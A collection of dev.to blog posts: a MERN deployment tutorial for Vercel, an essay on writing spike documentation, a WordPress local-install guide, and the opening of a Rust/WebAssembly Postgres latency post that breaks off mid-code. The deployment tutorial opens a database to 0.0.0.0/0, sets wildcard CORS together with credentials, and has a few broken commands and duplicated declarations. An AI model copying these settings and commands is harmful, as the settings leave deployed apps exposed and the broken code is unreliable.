prompt 2. Navigate to the directory where you want to create your project 3. Run the following command: ``` npm create-react-app client ``` 4. Once the installation is complete, navigate into your new project directory: ``` cd client ``` 5. Start the development server to ensure everything is working: ``` npm start ``` Your default web browser should open and display the default React app page. **Setting up the Node.js/Express server** 1. In your terminal. navigate back to your main project directory 2. Create a new directory for your server: ``` mkdir server cd server ``` 3. Initialize a new Node.js project: ``` npm init -y ``` 4. Install the necessary dependencies: ``` npm i express bodyParser mongodb mongoose cors dotenv ``` 5. Create a new file named index.js in the server directory and add the following basic Express server setup: ``` // index.js require('dotenv').config(); const express = require('express'); const bodyParser = require('body-parser'); const cors = require('cors'); const app = express(); app.use(cors()); app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: true })); app.use(express.json()); app.use("/", (req, res) => { res.send("Server running."); }); const port = process.env.PORT || 9000; app.listen(port, () => { console.log(`Server is running on port ${port}`); }); ``` 6. Add a start script to your package.json file in the server directory ``` "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "start": "nodemon index.js" }, ``` 7. Start your server: ``` npm start build ``` Output>>>>>> ``` PS C:\Users\Matrix\Documents\D.M.F\server> npm start build > server@1.0.0 start > nodemon index.js build [nodemon] 3.1.0 [nodemon] to restart at any time, enter `rs` [nodemon] watching path(s): *.* [nodemon] watching extensions: js,mjs,cjs,json [nodemon] starting `node index.js build` Server is running on port 9000 ``` **Configuring the Backend** create a new .js file in your backend directory and add the following code: ``` const mongoose = require('mongoose'); const connectDB = async () => { try { await mongoose.connect(process.env.MONGODB_URI, { useNewUrlParser: true, useUnifiedTopology: true, }); console.log('MongoDB connected successfully'); } catch (error) { console.error('MongoDB connection error:', error); process.exit(1); } }; module.exports = connectDB; ``` **Setting up MongoDB connection and Creating environment variables** 1. Log in to your MongoDB Atlas account [https://www.mongodb.com/cloud/atlas/register](https://www.mongodb.com/cloud/atlas/register) 2. Navigate to your cluster's Network Access settings 3. Click on "Add IP Address", 4. To allow connections from any IP address (suitable for development but should be restricted for production), enter: IP Address: 0.0.0.0/0 Description: Allow access from anywhere 5. Click "Confirm". ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s3alpo7jqm1k92b9ljs1.png) _Important:_ > Allowing access from 0.0.0.0/0 means your database can be accessed from any IP address. This is convenient for development and testing, but for a production environment, you should restrict access to only the necessary IP addresses or ranges for security reasons. Create a .env file in your backend directory and add your MongoDB connection string: ``` MONGODB_URI=your_mongodb_connection_string_here PORT=9000 ``` Replace `your_mongodb_connection_string_here` **Structuring the Express app** Now, update `index.js` file to incorporate these changes: ``` require('dotenv').config(); const express = require('express'); const bodyParser = require('body-parser'); const cors = require('cors'); const connectDB = require('./db'); const app = express(); // Connect to MongoDB connectDB(); // Middleware app.use(cors()); app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: true })); app.use(express.json()); // Routes app.get("/", (req, res) => { res.send("Server deployed and running on vercel."); }); // You can add more route files here as your application grows // app.use('/api/users', require('./routes/users')); // app.use('/api/posts', require('./routes/posts')); const port = process.env.PORT || 9000; app.listen(port, () => { console.log(`Server is running on port ${port}`); }); ``` **Developing the Frontend** For the purpose of this article, we'll be using the following structure to illustrate how to organize a React frontend. Keep in mind that React is highly flexible, and you can adapt this organization to best suit your project's specific requirements. **React App Structure** Let's consider the following structure for our React application: ``` client/ ├── src/ │ ├── components/ │ ├── services/ │ ├── styles/ │ ├── App.js │ └── index.js ├── package.json └── README.md ``` - components/: Contains all React components - services/: Houses API-related code - styles/: Stores CSS files **Creating Necessary Components** For this project, I've created several key components. Here's an example of one of the main components, `UserManagement.js`: ``` import React, { useEffect, useState } from 'react'; import api from '../services/api'; import IncomingRequestTable from './IncomingRequestTable'; import MembersTable from './MembersTable'; import VolunteerTable from './VolunteerTable'; import './user-management.css'; const UserManagement = () => { const [showIncomingRequests, setShowIncomingRequests] = useState(true); const [incomingRequests, setIncomingRequests] = useState([]); const [teamMembers, setTeamMembers] = useState([]); const [showVolunteers, setShowVolunteers] = useState(false); const [loading, setLoading] = useState(true); const [error, setError] = useState(null); useEffect(() => { fetchIncomingRequests(); fetchTeamMembers(); }, []); // Fetch functions and other logic here... return ( <div className="user-management-main-container"> {/* Component JSX here... */} </div> ); }; export default UserManagement; ``` > This component manages the display of different user tables and handles data fetching. **Implementing API Calls to the Backend** To interact with our backend, I've created an `api.js` file in the services folder. Here's a snippet of how it's structured: ``` const BASE_URL = 'https://localhost:9000'; const handleResponse = async (response) => { if (!response.ok) { const error = await response.text(); throw new Error(error); } return response.json(); }; const api = { team: { getMembers: (status) => fetch(`${BASE_URL}/get-team-members?status=${status}`) .then(handleResponse), acceptRequest: (userId) => fetch(`${BASE_URL}/accept-request/${userId}`, { method: 'POST', }).then(handleResponse), // Other API methods... }, // Other API categories... }; export default api; ``` > This centralized API structure allows for easy management of all backend requests. In the components, we use these API calls like this: ``` const fetchIncomingRequests = async () => { try { const data = await api.team.getMembers('pending'); setIncomingRequests(data); } catch (error) { setError('Error fetching incoming requests'); } finally { setLoading(false); } }; ``` This approach keeps our components clean and our API calls organized. **Connecting Frontend and Backend** In this section, we'll focus on configuring CORS (Cross-Origin Resource Sharing) and testing local communication between our React frontend and Express backend. Configuring CORS CORS is a crucial security feature that needs to be properly configured to allow our frontend to communicate with the backend. In `index.js` file, we've already set up CORS: ``` const cors = require('cors'); app.use(cors()); app.use(cors({ origin: 'http://localhost:9000' //to be changed later to vercel url })); ``` **Testing Local Communication** To test the communication between your frontend and backend locally: Start your backend server: ``` npm start build ``` You should see a message: `Server is running on port 9000` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fm6z91sfndh2f6hoccvd.png) In your frontend's api.js file, ensure you're using the correct local URL. For this article: `const BASE_URL = 'http://localhost:9000';` Start your React development server: `npm start` Test an API call, for example, fetching team members: ``` javascriptCopyconst fetchTeamMembers = async () => { try { const response = await fetch(`${BASE_URL}/get-team-members?status=accepted`); const data = await response.json(); console.log('Team members:', data); } catch (error) { console.error('Error fetching team members:', error); } }; ``` Check your browser's console and network tab to ensure the request is successful and data is being received. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bvqffahg1xsw6x7lsoge.png) If you encounter any CORS errors, double-check your CORS configuration in the backend. **Preparing for Deployment** In this section, we'll focus on creating a Vercel configuration file and pushing your code to GitHub repositories, which are crucial steps for deploying your application on Vercel. **Creating a Vercel Configuration File** Vercel uses a configuration file named `vercel.json` to specify how to build and deploy your application. Here's the configuration file we'll use: ``` { "version": 2, "builds": [ { "src": "*.js", "use": "@vercel/node" } ], "routes": [ { "src": "/(.*)", "dest": "/", "methods": ["GET","POST", "PUT", "DELETE", "PATCH", "OPTIONS"], "headers": { "Access-Control-Allow-Origin": "*", "Access-Control-Allow-Credentials": "true", "Access-Control-Allow-Headers": "X-CSRF-Token, X-Requested-With, Accept, Accept-Version, Content-Length, Content-MD5, Content-Type, Date, X-Api-Version" } } ] } ``` This configuration does the following: - Specifies that we're using version 2 of Vercel's configuration. - Sets up builds for all JavaScript files using the Node.js runtime. - Configures routes to handle all HTTP methods and sets up CORS headers. > Create this file in the root of your backend project and name it `vercel.json`. **Pushing Code to GitHub Repositories** Before deploying, you need to push your code to GitHub: For this project, 1. create two repositories on GitHub: one for your frontend and one for your backend. 2. In your backend directory, initialize a Git repository if you haven't already: ``` git init ``` 3. Add your files and commit: ``` git add . git commit -m "Initial commit for backend" ``` 4. Add your GitHub repository as a remote and push: ``` git remote add origin https://github.com/your-username/your-backend-repo.git git branch -M main git push -u origin main ``` 5. Repeat steps 2-4 for your frontend directory, using the frontend GitHub repository URL. **Installing and Using Vercel CLI** To deploy your application using Vercel, you'll need to install and use the Vercel CLI: Install Vercel CLI globally: ``` npm install -g vercel ``` Verify the installation: ``` `vercel --version` ``` Log in to your Vercel account: ``` vercel login ``` ![Vercel Login CLI](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cwg7qu0kxsxqdo4c860t.png) ![Vercel Login Success](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/83kgnj5gek9jxvhxfz4y.png) **Deploying to Vercel** Before starting, ensure you're logged into your Vercel account. **Deploying the React Frontend** In the Vercel dashboard, click on `"Add New"` and select `"Project"` from the dropdown. ![Vercel Dashboard](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rtw2i777oc1p6ot4dmbn.png) Choose `"Import Git Repository"` and select your frontend repository. ![Selecting Repo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/c2iv0m9efeltiyo188iu.png) Configure the project: - Enter a project name - For Framework Preset, select `"Create React App"` - Set Root Directory to "./" (if your package.json is in the root) - Leave Build and Output Settings as default - Leave Environment Variables as default ![Configurations](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sdnukm58mn9aqjfcunyb.png) Click `"Deploy"` Vercel will now build and deploy your React frontend. Once complete, you'll receive a URL for your deployed frontend. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0cqbopsbf69n7pcat8j9.png) **Deploying the Node.js Backend** Again, click on `"Add New"` and select `"Project"`. Choose `"Import Git Repository"` and select your backend repository. Configure the project: - Enter a project name - For Framework Preset, select "Other" - Set Root Directory to "./" (if your package.json is in the root) - Leave Build and Output Settings as default - Configuring `"Environment Variables"`: Add your environment variables exactly as they appear in your local .env file. For example: - Key: `MONGODB_URI` - Value: `mongodb+srv://your_username:your_password@your_cluster.mongodb.net/your_database?retryWrites=true&w=majority` Add any other necessary environment variables (e.g., PORT, JWT_SECRET, etc.) Click `"Deploy"` ![Environment Variables setup](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q1ifr2omrttkjh0fje1y.png) Vercel will begin building your backend code. However, the build may take some time due to environment variables. ![Success for backend deploy](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/h9ae6xbfp46647m3eq7t.png) ![Both front and backend deployments](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dkxgln0tyug39j6isr09.png) _You've successfully deployed frontend React App and Backend Node js Server to Vercel!!!_ **Important Notes:** > Make sure your backend code is using environment variables correctly, e.g., `process.env.MONGODB_URI`. > In your frontend code, update the API base URL to use the deployed backend URL. > If you make changes to your code, push them to GitHub. Vercel will automatically redeploy your application. > Always keep your environment variables secret and never commit them to your repository. **Updating API Endpoints in the Frontend** After successfully deploying both your frontend and backend, you need to update the API endpoints in your frontend code to point to the deployed backend URL. In your frontend code, locate your API configuration file (e.g.,` src/services/api.js`). Update the BASE_URL to your deployed backend URL: ``` const BASE_URL = 'http://localhost:9000'; // Local development const BASE_URL = 'https://dmfc-server.vercel.app'; // Deployed backend ``` Redeploy your frontend application to Vercel with these changes by pushing to Github. **Final Testing and Verification** Now it's time to thoroughly test your deployed application: Open your deployed frontend URL in a web browser. Test all functionalities of your application, ensuring they work as expected with the live backend. Test your application on different devices and browsers to ensure compatibility. Monitor your Vercel logs and MongoDB Atlas dashboard for any errors or unexpected behavior. ![Frontend](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e6w5m66jcsl7kxuj88ax.png) ![Backend](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ls9h2xw0egtoucrbcg6k.png) **Conclusion** Congratulations! You've successfully deployed your MERN stack application to Vercel. Here's a summary of what we've accomplished: - Set up a React frontend and Node.js/Express backend with MongoDB integration. - Prepared our application for deployment by creating necessary configuration files. - Deployed both frontend and backend to Vercel. - Configured environment variables to ensure secure and proper functionality. - Updated API endpoints and performed final testing. > Your application is now live and accessible to users worldwide
matrix24483
1,919,986
Write spike stories like fairy tales
For more content like this subscribe to the ShiftMag newsletter. _ “Hello, my name is Inigo...
0
2024-07-17T13:05:02
https://shiftmag.dev/how-to-write-spike-3708/
softwareengineering, documentation, spike, techicalwriting
--- title: Write spike stories like fairy tales published: true date: 2024-07-11 11:28:23 UTC tags: SoftwareEngineering,Documentation,spike,techicalwriting canonical_url: https://shiftmag.dev/how-to-write-spike-3708/ --- ![](https://shiftmag.dev/wp-content/uploads/2024/07/how-to-write-spikes.png?x43006) _For more content like this **[subscribe to the ShiftMag newsletter](https://shiftmag.dev/newsletter/)**._ _ **“Hello, my name is Inigo Montoya. You killed my father. Prepare to die.”** _ Look at these three short, beautiful sentences and ask yourself whether there is something left to be desired. Yeah, I thought as much. They’re perfect because they strike the balance between being short enough not to bore you and driving their point across, just like Inigo drove his rapier through Rugen’s torso. This is exactly how your spikes should be. I mean, you shouldn’t drive your spike through anyone’s torso, but you get the gist. Coincidentally (or not), this quote is from the cult movie [The Princess Bride](https://www.imdb.com/title/tt0093779/), which could be considered a fairy tale. But what does a princess have to do with such a technical term as a spike? …what’s that? _“What’s technical about **a spike**?”_ I hear you asking. My bad, I should’ve explained that I don’t mean sharpened sticks when I say spikes. So what **do** I mean? ## What is a spike? We’re, of course, talking about spikes in software development. Let’s skip the [textbook definition of _eXtreme Programming mumbo jumbo_](https://en.wikipedia.org/wiki/Spike_(software_development)) and let me explain it in the simplest of terms: **it’s a process of discovery.** You have a problem you need to solve, but there are just way too many questions and unknowns. Sure, you could dive in head-first and attempt to resolve all the issues on the spot, but we all know how that ends. Been there, done that. Spikes are meant to allocate some time for **research and documentation of the problem you’re facing.** The output is usually an article or technical documentation to which you and your team can later refer _if_ (sorry… I meant _when_) you decide to tackle the problem. The term itself makes sense in the environment of agile development, but let’s forget all of that and simply call the process of discovery and its documentation a spike. Before we go any further, I should probably warn you that I won’t actually tell you what methodologies to use to complete a spike – how to do the research, what to include, etc. This is a topic for another article. **We’re going to discuss how to make your spikes more memorable, easier to read, and simply better**. ![](https://shiftmag.dev/wp-content/uploads/2024/07/extreme-programming--1024x538.png?x43006) _In this pictu__re: A man is trying to make his spike more memorable._ Cool, now that we have that out of the way, I can answer another question you probably have. **_What the hell do you mean by “spikes are fairy tales”?_** You know exactly what I mean. Don’t tell me you’ve never trailed off to Wonderland when reading documentation. We all did it. Studies show that over **90% of developers fall asleep when reading technical documentation**. Source: trust me bro. That’s what spikes and fairy tales have in common – they make us fall asleep while taking us on a journey through made-up scenarios that we know can never be reality. Okay, okay. I think I’ve been facetious enough. Let’s be serious for a second – it’s a real issue, and I’m sure most, if not all, of us have experienced it from both sides. You spend time and energy writing something only to be asked over and over about details that are actually in there. Or you read through docs, and you just go, “Huh?” after every third sentence. It’s perfectly normal. We all get distracted when we read through something boring or when it’s so hard to read our eyes water up. I know you’re just itching to write a spike right now, but it’s very important, and I can’t stress this enough, so I will use big letters. It’s **VERY IMPORTANT** to understand the scope and the purpose of your documentation. It’s amazing when you write a spike that’s easy to read, memorable and engaging, but it’s a complete waste of time when you spend two days perfecting it only for no one to ever read it. **Ask yourself these questions:** - Is this topic important enough? - Will I or someone else refer to it later? - Will it teach junior colleagues something new? - Is the process as important as the outcome? If you’ve answered nay to any of these questions, then don’t bother. It’s better to just do hardcore robotic documentation, which will at least be easy to navigate through. I mean it. Just do “this is the problem, this is the solution, have a nice day”. Now that you’re able to identify what kind of documentation this article focuses on, we can go ahead and learn **how to be able to write spikes in a more human-friendly way.** But in order to do that, we’ll first have to understand what a spike is actually trying to achieve. ## What should a spike achieve? I’ve already said it a couple of times, but let’s repeat it again. The goal of the spike is to come up with one or multiple solutions to a problem, clear up all unknowns, and **document the process**. The last part is what’s important for us. Many of us fall into the trap of simply writing out the outcome in a very factual and technical manner. This is great if you want to refer to it quickly, but it does nothing when others try to understand the thought process you went through. If others don’t understand your decisions, you will face questions like _“Why did you choose this instead of that?”_, _“What if this happens? Have you thought of that?” or “I don’t understand how this is going to solve our issue; why are you like this? Why can’t you be normal like the others?”._ Okay, maybe not the last one, but you know what I mean. I don’t want to bore you too much but it’s important to understand how the reader of our spike should **feel** once they’re done reading it. Emphasis on **feel**. They should **feel** that they have the same or comparable understanding of the problem you have, they should **feel** that they know why you chose this solution, and they should **feel** awake and not asleep. The spike needs to introduce the problem, describe the research process, present the solutions, and evaluate them. It should answer all standing questions and it should be easy to refer to. On to some actual advice! ## How do we do it? _DISCLAIMER: I have no formal training in this. It’s just a bunch of stuff I thought made sense._ I wanted to refer to Inigo Montoya again, but it’s time to stop here. I’ve used his quote to hook you in but now I’m pretty much bending over backwards to make it fit our narrative. So let’s just retreat to a more simple structure we can follow: 1. The world building 2. The journey 3. The grand finale ### The world building First, you should introduce your readers to the problem. This is the world-building part—you introduce the characters, the world, and the basic premise of the story. It does not need to be too detailed; just use a few brief sentences and leverage references to tickets, diagrams, code, **or threads on Slack**. The key is to **keep it simple without omitting any important information**. Your introduction should also outline the plot. In other words, you should explain why we need to solve this problem. Again, just a few sentences, nothing too fancy. This is the easy part. What you want to achieve is to **have your readers understand the problem and why we’re solving it** after finishing your introduction. ### The journey Now that everyone knows what’s up, it’s time to tell the story itself. You went on an adventure and you want to share this adventure with others. You want to make sure that people will see what you’ve seen, feel what you’ve felt and be able to understand your motives. Remember, you’ve already been on this journey so you know exactly why it happened like it did. When you read your story, you know why you set fire to the forest, even though you didn’t explicitly say it – _everyone knows that there are monsters in that forest_! Well, that’s where you’re wrong. You have to realize that your readers did not have the same experience you did. **Do not make the mistake of assuming that readers know what you’re talking about** because chances are they don’t. Allow me to use an example from my own spike I wrote some time ago: _Let’s start by fetching n entries. We don’t need the values, we need the keys, so we could simply use the [`KEYS`](https://redis.io/commands/keys/) command, right? **WRONG!** I can’t count how many times I’ve seen “do not use KEYS in production!” plastered over the internet. Instead, the official docs point us towards using the [`SCAN`](https://redis.io/commands/scan/) command. It allows us to set the number of keys it will fetch, which we can set to n._ I could have just written, “We will use SCAN to get the entries”, but that would lead to questions. _Why did you use SCAN and not KEYS?_ From the style of this article and the short snippet of my spike, you can probably tell that I like to embellish stuff _a bit_. I would like to stress that **you don’t have to do this**. In fact, **you should not overdo it and rather keep it too short than too long**. It’s just my personal style, and wasting time on making something three times longer than it has to be is fun for me. Writing it like so: _Let’s start by fetching n entries. We will use the SCAN command, because official docs state that using KEYS is unsafe._ would have been perfectly fine. It’s shorter and much more to the point, which is absolutely a great thing. Remember, **it should be short enough to be digestible in one sitting (in most cases)**. The reason I wrote it like that and why I keep stuffing this fairy tale nonsense all over the place is to **break the monotony of “lecturing.”** People can take only so many sentences of straight-up facts before their mind starts to wander off. By being funny (or at least trying to), you shock the reader a bit. Maybe you provoke a chuckle; maybe the reader cringes a bit. Both are fine – they’ve achieved their purpose, and the attention span has reset. Now, the reader is ready to consume more facts. Use jokes, pictures, whatever comes to mind. It doesn’t need to be funny, just not too serious. There is a delicate balance between just spitting facts and making a clown out of yourself, and quite honestly, it’s very hard to get right. But this is what it’s about – **it’s about making the read interesting**. At the same time, **make sure that your breaks don’t disrupt the flow of thought too much**. It goes without saying that the process you’re describing should make logical sense. Start by building a knowledge foundation, exploring options, guiding through scenarios, and finally arriving at a decision. A good tip is to simply follow the process you went through because it’s natural. When you read a story, it doesn’t paint a picture of a bustling city, only to go back to the dangers of the road leading to it. ![](https://shiftmag.dev/wp-content/uploads/2024/07/python-monty--1024x538.png?x43006) ![](https://confluence.infobip.com/download/attachments/500420841/python.jpeg?version=1&modificationDate=1709735046000&api=v2)_In this picture: A band of brave knights traveling to a bustling city._ Additionally, notice the style in which the few sentences from my spike were written. _“We don’t need the values…”_ or _“the official docs point us towards…”_. **We want our writing to be engaging, to make the reader feel like they’re also a part of the process**. Writing it out like, _“The values are not necessary. Keys will suffice. The official docs state that this and that should be used. Beep boop.”_ is incredibly monotonous and straight-up boring. Another important thing to practice is assuming your reader will only have the most basic knowledge of the domain. Think of it as explaining to a kindergartner. You may think this would be an insult to your more experienced coworkers, but personally, I view it in the complete opposite way. Your goal is to explain something using the least complicated sentences so that your readers understand what is going on. Don’t shy away from using colors and animals instead of being overly technical. But at the same time, don’t overdo it. **Some parts will require straight-up technical terms or diagrams** , and that is okay. **Don’t try to substitute those with abstract concepts** because that will result in no one being any wiser. What you can do, however, is ease your readers in by first explaining the thing simply and then fitting the more technical details into the framework you’ve built. Last but not least – **formatting is your friend**. It’s much easier to read through text that is broken down into logical sections than through an unrelenting wall of text OF DOOM. You know how letters just kind of start to blend together, and you keep skipping lines? Yeah. Another thing you can use to a great effect is to highlight important parts of your text by using **bold** or colors. Just look at this article, and you’ll get the idea. Hopefully not the wrong one. ### The grand finale Finally, we get to the climax. This is what everyone is here for. The knight in shining armor had finally slain the dragon and rescued the princess. Everyone is happy and there’s fireworks everywhere. This is what your solution and results should look like. **Don’t be afraid to use colorful pictures and striking formatting**. Just take a look; which one do you think looks better? This: _“We can put a smart balancer in front of our resolvers. That way the 3rd party service will have to know just one endpoint. The balancer will forward the request to our resolvers, which will load the data from our stretched database while caching the results. Because the result is not necessary for processing, we can notify the consumer asynchronously.” (yawn)_ or this? ![](https://shiftmag.dev/wp-content/uploads/2024/07/example-1024x373.png?x43006) _In this picture, A man is trying to make up a bogus diagram and failing miserably._ Which one was easier and more fun to understand? By the way, it’s [excalidraw.com](https://excalidraw.com/). However, don’t make the mistake of thinking you can _fairytale-ize_ this part too much. This is where the actual next steps should be and it’s important to remember that this is the part that people will most often come back to refer to. **You can’t avoid technical details here, so don’t try to. ** But that does not mean you can’t make it as digestible as possible. It’s nice to have it funny and readable and everything, but **when people come back to refer to your solutions, they should be easy to find and understand**. Finally, remember to evaluate the solutions you’ve proposed. Personally, I would say that the best approach here is to keep it stupid and simple and do good ole pros and cons. Bonus points if you put it inside a fancy table and make the pros green and cons red. **Let’s sum it up** Screenshot this, put it next to your bed, and read it each time you go to sleep. - Keep it simple, but don’t leave out important details. - Keep it short, and don’t overdo it with storytelling. It should be digestible in one sitting. - Make sure your readers understand the issue as you do. Guide them through the process. - Leverage external references. - Write in an engaging way – make your readers feel like they’re playing an important part. - Assume that your readers have only basic knowledge of the domain. - Break the monotony by cracking jokes or using media. - Formatting is your friend – use it to drive your point across; important parts should stick out. - When some part requires technical details, put them in. - Spikes should be easy to navigate through, just stick to Introduction – Process explanation – Solution. ### WTF did I just read? That’s a great question. Quite frankly I don’t know wtf I just wrote. But if you got to this part it means that I probably did something right. The point I was trying to make is that **technical documentation does not need to be oppressively professional, dull, and boring**. We can’t avoid it completely, but that does not mean we can’t make the reading experience better. Many people will make the counterpoint of this being a waste of time and energy, and I can’t say that they’re completely wrong. It’s not our job to write funny or beautiful stories, our job is to make machines do our bidding (while we still can anyways). But it’s also our job to do it in an efficient way. Put on your corporate face and ask yourself this – what wastes more money – a developer spending three hours instead of one writing documentation, or six developers spending an hour each instead of 15 minutes trying to understand it? If it’s going to be easier explaining your docs, why bother writing them at all? When you decide to spend the energy to write it, you might as well write it well. Or, what the hell, you can just paste your documents into an AI chat bot and prompt it to improve them. What do I know? Now, then, off to sharpen another spike! The post [Write spike stories like fairy tales](https://shiftmag.dev/how-to-write-spike-3708/) appeared first on [ShiftMag](https://shiftmag.dev).
shiftmag
1,920,095
Getting Started with WordPress: A Step-by-Step Guide to Local Installation
Introduction: 🚀 Welcome to Series 1: Building a Simple WordPress Site! 🚀 In this series, I'll guide...
28,055
2024-07-13T13:49:47
https://dev.to/anchal_makhijani/getting-started-with-wordpress-a-step-by-step-guide-to-local-installation-3da2
webdev, learning, opensource
**Introduction:** 🚀 Welcome to Series 1: Building a Simple WordPress Site! 🚀 In this series, I'll guide you through the essential steps to create and manage your very own WordPress website. Whether you're a WordPress newbie or looking to refine your skills, this series will equip you with the knowledge to build a functional and customizable site. 🌐 **Prerequisites:** Before starting this series, make sure you have: - Basic familiarity with web development concepts (HTML, CSS). 💻 - Access to a computer with an internet connection. 🌐 - A local development environment set up (XAMPP, LAMP, etc.) for installing WordPress. 🛠️ No prior experience with WordPress is required, but having a basic understanding of web technologies will enhance your learning experience. Let's dive into creating your WordPress site step-by-step! 🎉 **Part 1: Getting Started with WordPress** **Step-by-Step Guide** **Step 1: Introduction and Setup** _Title: Introduction to WordPress_ _Overview of WordPress as a CMS:_ WordPress stands as the most popular Content Management System (CMS) globally, facilitating the creation and management of websites. Its versatility supports a wide range of applications, from blogs to complex e-commerce platforms.🌍 _Installing WordPress locally using XAMPP, MAMP or LAMP:_ **_XAMPP (Windows, macOS, Linux)_** - XAMPP: Visit [Apache Friends](https://www.apachefriends.org/download.html) and download XAMPP for your operating system. - Run the installer and follow the prompts to install XAMPP. - Open the XAMPP Control Panel and click "Start" next to Apache and MySQL. **_LAMP (Linux)_** Open your Terminal for installation : - Update Package Repository: `sudo apt update` - Install Apache Web Server: `sudo apt install apache2` - Verify Apache Installation: `sudo systemctl status apache2` - Adjust Firewall Settings: `sudo ufw allow 'Apache'` - Install MySQL/MariaDB Database Server: `sudo apt install mysql-server` - Secure MySQL/MariaDB Installation: `sudo mysql_secure_installation` - Install PHP: `sudo apt install php libapache2-mod-php php-mysql` - Verify PHP Installation: `sudo nano /var/www/html/info.php` Add the following PHP code: `<?php phpinfo(); ?>` Save and close the file. Access http://localhost/info.php in your browser to see PHP information. - Testing: echo "<?php phpinfo(); ?>" | sudo tee /var/www/html/test.php Access http://localhost/test.php to verify PHP functionality. **_MAMP (macOS)_** - Visit [MAMP](https://www.mamp.info/en/downloads/) and download MAMP for macOS. - Open the downloaded .dmg file and drag the MAMP folder to your Applications folder - Open Applications, then MAMP, and double-click MAMP.app. - Click "Start Servers" to start Apache and MySQL. **_Conclusion_** 🎉 Congratulations on setting up your local development environment with XAMPP, LAMP, or MAMP! This crucial step allows you to develop and test your WordPress site safely. 🎉 In this episode, we have: Introduced WordPress as a CMS. 📝 Detailed the setup for XAMPP, LAMP, and MAMP. 🛠️ Next, we’ll cover installing WordPress and exploring its features. Stay tuned for more on building your WordPress site from scratch. Happy developing! 🚀💻🌟
anchal_makhijani
1,920,167
Latency at the Edge with Rust/WebAssembly and Postgres: Part 1
We have been working on enabling Exograph on WebAssembly. Since we have implemented Exograph using...
0
2024-07-12T01:35:59
https://exograph.dev/blog/wasm-pg-explorations-1
postgres, webassembly, rust
--- title: Latency at the Edge with Rust/WebAssembly and Postgres: Part 1 published: true date: 2024-06-05 00:00:00 UTC tags: postgres,wasm,Rust,WebAssembly canonical_url: https://exograph.dev/blog/wasm-pg-explorations-1 --- We have been working on enabling [Exograph](https://exograph.dev) on [WebAssembly](https://webassembly.org/). Since we have implemented Exograph using [Rust](https://www.rust-lang.org/), it was natural to target WebAssembly. You can soon build secure, flexible, and efficient [GraphQL](https://graphql.org/) backends using Exograph and run them at the edge. During our journey towards WebAssembly support, we learned a few things to improve the latency of Rust-based programs targeting WebAssembly in [Cloudflare Workers](https://developers.cloudflare.com/workers/) connecting to [Postgres](https://www.postgresql.org/). This two-part series shares those learnings. In this first post, we will set up a simple Cloudflare Worker connecting to a Postgres database and get baseline latency measurements. In the next post, we will explore various ways to improve it. Even though we experimented in the context of Exograph, the learnings should apply to anyone using WebAssembly in Cloudflare Workers (or other platforms that support WebAssembly) to connect to Postgres. > Second Part > Read [Part 2](https://exograph.dev/blog/wasm-pg-explorations-2) that improves latency by a factor of 6! ## Rust Cloudflare Workers Cloudflare Workers is a serverless platform that allows you to run code at the edge. The [V8 engine](https://v8.dev/) forms the underpinning of the Cloudflare Worker platform. Since V8 supports JavaScript, it is the primary language for writing Cloudflare Workers. However, JavaScript running in V8 can load WebAssembly modules. Therefore, you can write some parts of a worker in other languages, such as Rust, compile it to WebAssembly, and load that from JavaScript. Cloudflare Worker's Rust tooling enables writing workers entirely in Rust. Behind the scenes, the tooling compiles the Rust code to WebAssembly and loads it in a JavaScript host. The Rust code you write must be able to compile to `wasm32-unknown-unknown` target. Consequently, it must follow the restrictions of WebAssembly. For example, it cannot access the filesystem or network directly. Instead, it must rely on the host-provided capabilities. Cloudflare provides such capabilities through the [worker-rs](https://github.com/cloudflare/workers-rs) crate. This crate, in turn, uses [wasm-bindgen](https://github.com/rustwasm/wasm-bindgen) to export a few JavaScript functions to the Rust code. For example, it allows opening network sockets. We will use this capability later to integrate Postgres. Here is a minimal Cloudflare Worker in Rust: ```rust use worker::*; #[event(fetch)] async fn main(_req: Request, _env: Env, _ctx: Context) -> Result<Response> { Ok(Response::ok("Hello, Cloudflare!")?) } ``` To deploy, you can use the `npx wrangler deploy` command, which compiles the Rust code to WebAssembly, generates the necessary JavaScript code, and deploys it to the Cloudflare network. Before moving on, let's measure the latency of this worker. We will use [Ohayou](https://github.com/hatoo/oha), an HTTP load generator written in Rust. We measure latency using a single concurrent client (`-c 1`) and one hundred requests (`-n 100`). ```sh oha -c 1 -n 100 <worker-url> ... Slowest: 0.2806 secs Fastest: 0.0127 secs Average: 0.0214 secs ... ``` It takes an average of 21ms to respond to a request. This is a good baseline to compare when we add Postgres to the mix. ## Focusing on latency We will focus on measuring the lower bound for latency of the roundtrip for a request to the worker who queries a Postgres database before responding. Here is our setup: - Use a [Neon](https://neon.tech) Postgres database with the following table and no rows to focus on network latency (and not database processing time). ```sql CREATE TABLE todos ( id SERIAL PRIMARY KEY, title TEXT NOT NULL, completed BOOLEAN NOT NULL ); ``` - Implement a Cloudflare Worker that responds to `GET` by fetching all completed todos from the table and returning them as a JSON response (of course, since there is no data, the response will be an empty array, but the use of a predicate will allow us to explore some practical considerations where the queries will have a few parameters). - Place the worker, database, and client in the same region. While, we can't control the worker placement, Cloudflare will place the worker close to either the client or the database (which we've put in the same region). All right, let's get started! ## Connecting to Postgres Let's implement a simple worker that fetches all completed todos from the Neon Postgres database. We will use the [tokio-postgres](https://crates.io/crates/tokio-postgres) crate to connect to the database. ```rust #[event(fetch)] async fn main(_req: Request, env: Env, _ctx: Context) -> Result<Response> { let config = tokio_postgres::config::Config::from_str(&env.secret("DATABASE_URL")?.to_string()) .map_err(|e| worker::Error::RustError(format!("Failed to parse configuration: {:?}", e)))?; let host = match &config.get_hosts()[0] { Host::Tcp(host) => host, _ => { return Err(worker::Error::RustError("Could not parse host".to_string())); } }; let port = config.get_ports()[0]; let 